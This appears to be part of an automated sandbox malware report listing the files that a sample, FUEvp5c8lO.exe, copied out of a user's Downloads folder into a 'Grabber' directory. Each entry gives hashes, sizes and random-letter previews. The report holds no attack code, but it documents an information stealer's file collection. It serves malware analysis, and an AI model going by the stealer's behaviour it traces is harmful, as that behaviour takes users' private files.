C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\AIXACVYBSB.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DTBZGIOOSO.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\MNULNCRIYC.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\MNULNCRIYC.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PSAMNLJHZW.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PSAMNLJHZW.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\QVTVNIBKSD.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
